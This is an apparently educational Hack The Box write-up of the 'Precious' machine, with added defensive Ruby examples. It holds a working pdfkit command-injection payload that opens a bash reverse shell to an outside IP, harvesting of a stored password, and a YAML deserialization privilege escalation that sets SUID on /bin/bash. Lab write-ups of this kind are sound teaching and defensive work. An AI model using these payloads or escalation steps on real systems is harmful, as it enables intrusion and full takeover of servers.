Hack The Box. Precious walkthrough. Vulnerability CVE-2022-25765

Collection of information

First of all, let’s collect information about the machine.

We use nmap with the -sV -sC switches:

The scan shows that ports 22 and 80 are open. Port 80 redirects to http://precious.htb, so to reach the site we add that name to /etc/hosts.

Let’s see what directories there are using the dirsearch tool:

Nothing interesting turns up. Let’s look at the web server itself. Going to precious.htb, we see this page:

The web server offers a service for converting web pages to a PDF file. Let’s check whether it works by starting a local web server on our own machine.

Let’s create index.html in the directory served by our local server and submit its URL to the converter:

It worked! Let’s download the PDF file and see what it is:

It looks like a normal PDF file. Looking at its properties, we see that it was created by pdfkit v0.8.6.

A quick Google search turns up CVE-2022-25765: this version of pdfkit is vulnerable to command injection.

You can learn more about the CVE here: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795

According to the CVE description, “an application could be vulnerable if it tries to render a URL that contains query string parameters with user input” and “if the provided parameter happens to contain a URL encoded character and a shell command substitution string, it will be included in the command that PDFKit executes to render the PDF”. That’s enough to get in!

Run netcat listening on port 4444:

sudo nc -lnvp 4444

In the http://precious.htb web service, we adapt the exploit to our needs and enter:

http://localhost.com/?name=#{'%20`bash -c "bash -i >& /dev/tcp/10.10.14.33/4444 0>&1"`'}

We look in the terminal and see that we have entered.
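As an added example (not code from this post or from pdfkit itself), here is how the converter service could have defended against this class of bug in Ruby: validate the user-supplied URL before rendering, and start wkhtmltopdf with an argv array so that no shell ever parses the URL. The sample URLs, the helper names, and the use of echo as a stand-in renderer are assumptions made for the demonstration.

```ruby
# Added example (not the page's or pdfkit's own code): what a PDF conversion
# service should do before handing a user-supplied URL to wkhtmltopdf.
# Two independent defences are shown:
#   1. validate the URL (scheme, host, no raw shell metacharacters),
#   2. spawn the renderer with an argv array, so no shell ever sees the URL.
require 'uri'
require 'open3'

# Characters that mean something to a POSIX shell. A URL coming from a user
# never legitimately needs them in raw form; they would be percent-encoded.
SHELL_META = /[`$(){}|;&<>'"\\\s]/

# Returns a validated URI object, or raises ArgumentError with the reason.
def validate_render_url(raw)
  raise ArgumentError, 'empty url' if raw.nil? || raw.strip.empty?
  raise ArgumentError, 'shell metacharacters in url' if raw.match?(SHELL_META)
  uri = URI.parse(raw)
  raise ArgumentError, "unsupported scheme #{uri.scheme.inspect}" unless %w[http https].include?(uri.scheme)
  raise ArgumentError, 'missing host' if uri.host.nil? || uri.host.empty?
  uri
rescue URI::InvalidURIError => e
  raise ArgumentError, "unparseable url: #{e.message}"
end

# Builds the renderer command as an argv array. Passing an array (not a
# single string) to Open3/IO.popen/system makes Ruby exec() the program
# directly; backticks or $(...) inside the URL are then just bytes in argv[1].
def render_argv(uri, out_path, executable: 'wkhtmltopdf')
  [executable, uri.to_s, out_path]
end

# Validates, then runs the renderer without a shell. Returns [stdout, success].
def render_pdf(raw_url, out_path, executable: 'wkhtmltopdf')
  argv = render_argv(validate_render_url(raw_url), out_path, executable: executable)
  stdout, status = Open3.capture2(*argv) # array form: no shell involved
  [stdout, status.success?]
end

if __FILE__ == $0
  # Constructed samples: a normal page, the injection pattern from the post
  # with a harmless command in place of the reverse shell, and a wrong scheme.
  samples = [
    'http://example.test/index.html',
    %q(http://localhost.test/?name=#{'%20`id`'}),
    'ftp://example.test/x'
  ]
  samples.each do |s|
    begin
      validate_render_url(s)
      puts "accept #{s}"
    rescue ArgumentError => e
      puts "reject #{s} (#{e.message})"
    end
  end
  # echo stands in for wkhtmltopdf here so the run needs nothing installed:
  # it prints its argv, showing the URL arrives as one untouched argument.
  begin
    out, ok = render_pdf('http://example.test/index.html', '/tmp/out.pdf', executable: 'echo')
    puts "argv as seen by the program: #{out.strip}" if ok
  rescue SystemCallError, NotImplementedError => e
    puts "could not spawn stand-in renderer: #{e.message}"
  end
end
```

Either defence alone stops the payload shown above: the validator rejects the backticks and quotes, and the array form of Open3.capture2 hands the URL to the program as a single argument without shell interpretation, so command substitution is never evaluated. On a host you are reviewing, gem list pdfkit shows the installed version, to be compared with the fixed release named on the Snyk page linked above.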

Get user flag:

whoami → ruby

So we are logged into the server as the ruby user. Moving to /home, we find two folders: one for our ruby user and one for user henry. Inside the henry folder is the user.txt file, our flag, but we don’t have access to it yet.

Looking around, we find a file called config in /home/ruby/.bundle.

We look at its contents with cat config and find the password for user henry.

Using henry’s credentials, we connect to the server via ssh as user henry:

Now we can look at user.txt, and take the first flag!

Get the root flag:

Now that we’re inside as henry, let’s see what we can do. We use the sudo -l command to see what can be run:

It looks like henry can run update_dependencies.rb as root. Let’s use cat to examine the file.

We look at the code and find that it uses YAML.load, which is vulnerable to a deserialization attack.

You can read more about YAML deserialization attacks here:

https://github.com/DevComputaria/KnowledgeBase/blob/master/pentesting-web/deserialization/python-yaml-deserialization.md

A short search leads to https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/ . We find dependencies.yml and modify it.

We open it with sudo nano dependencies.yml and take the Ruby on Rails code from the post above.

In the git_set: id line, we write "chmod 4777 /bin/bash"; if everything is thought out correctly, this will allow us to get root.

We run the script:

sudo /usr/bin/ruby /opt/update_dependencies.rb

It worked!

Now try /bin/bash -p:

Done, take the root flag!
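As an added example (not the box’s update_dependencies.rb and not code from the linked posts), here is what a privileged updater script should do instead of YAML.load: parse with YAML.safe_load, which refuses any !ruby/object tag, and then check that the result has the shape the script expects. The two YAML documents are constructed samples; the gem names, versions and the load_dependencies helper are assumptions for the demonstration.

```ruby
# Added example (not the box's script): safe parsing of a dependencies file.
# YAML.load on older Psych resolves tags like !ruby/object:SomeClass into real
# Ruby objects, which is what the deserialization attack relies on.
# YAML.safe_load refuses those tags unless a class is explicitly permitted.
require 'yaml'

# Constructed sample: what a legitimate dependencies.yml might hold.
BENIGN_YAML = <<~YML
  pdfkit: "0.8.7"
  rails: "7.0.4"
YML

# Constructed sample: a document asking Psych to instantiate a Ruby class
# (Set is used here only as a harmless stand-in for the tag syntax).
# safe_load raises Psych::DisallowedClass as soon as it meets the tag.
TAGGED_YAML = <<~YML
  pdfkit: !ruby/object:Set
    hash: {}
YML

# Parses the dependencies with safe_load and enforces the expected shape:
# a flat Hash of gem name => version string. Returns [:ok, hash] or
# [:error, message] and never lets a parser exception escape to the caller.
def load_dependencies(yaml_text)
  # permitted_classes: [] means only the YAML core types (strings, numbers,
  # booleans, arrays, hashes); aliases: false also blocks alias-based tricks.
  data = YAML.safe_load(yaml_text, permitted_classes: [], aliases: false)
  return [:error, 'top level must be a mapping'] unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && name.match?(/\A[a-z0-9_\-]+\z/i)
      return [:error, "bad gem name #{name.inspect}"]
    end
    unless version.is_a?(String) && version.match?(/\A\d+(\.\d+)*\z/)
      return [:error, "bad version for #{name}"]
    end
  end
  [:ok, data]
rescue Psych::DisallowedClass, Psych::BadAlias, Psych::SyntaxError => e
  [:error, "refused: #{e.class}"]
end

if __FILE__ == $0
  p load_dependencies(BENIGN_YAML)   # [:ok, {"pdfkit"=>"0.8.7", "rails"=>"7.0.4"}]
  p load_dependencies(TAGGED_YAML)   # [:error, "refused: Psych::DisallowedClass"]
  p load_dependencies("rails: latest\n")
end
```

Two caveats a reviewer would add. On Ruby 3.1 and later (Psych 4) YAML.load already behaves like safe_load and the old behaviour has moved to YAML.unsafe_load, so the Ruby version on the host decides whether a bare YAML.load is dangerous; the shape check is useful on every version. And parsing is only half of the problem in this box: a script that sudo runs as root should read its configuration from a path the unprivileged user cannot write, otherwise even a perfectly parsed file still lets that user choose what root installs.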
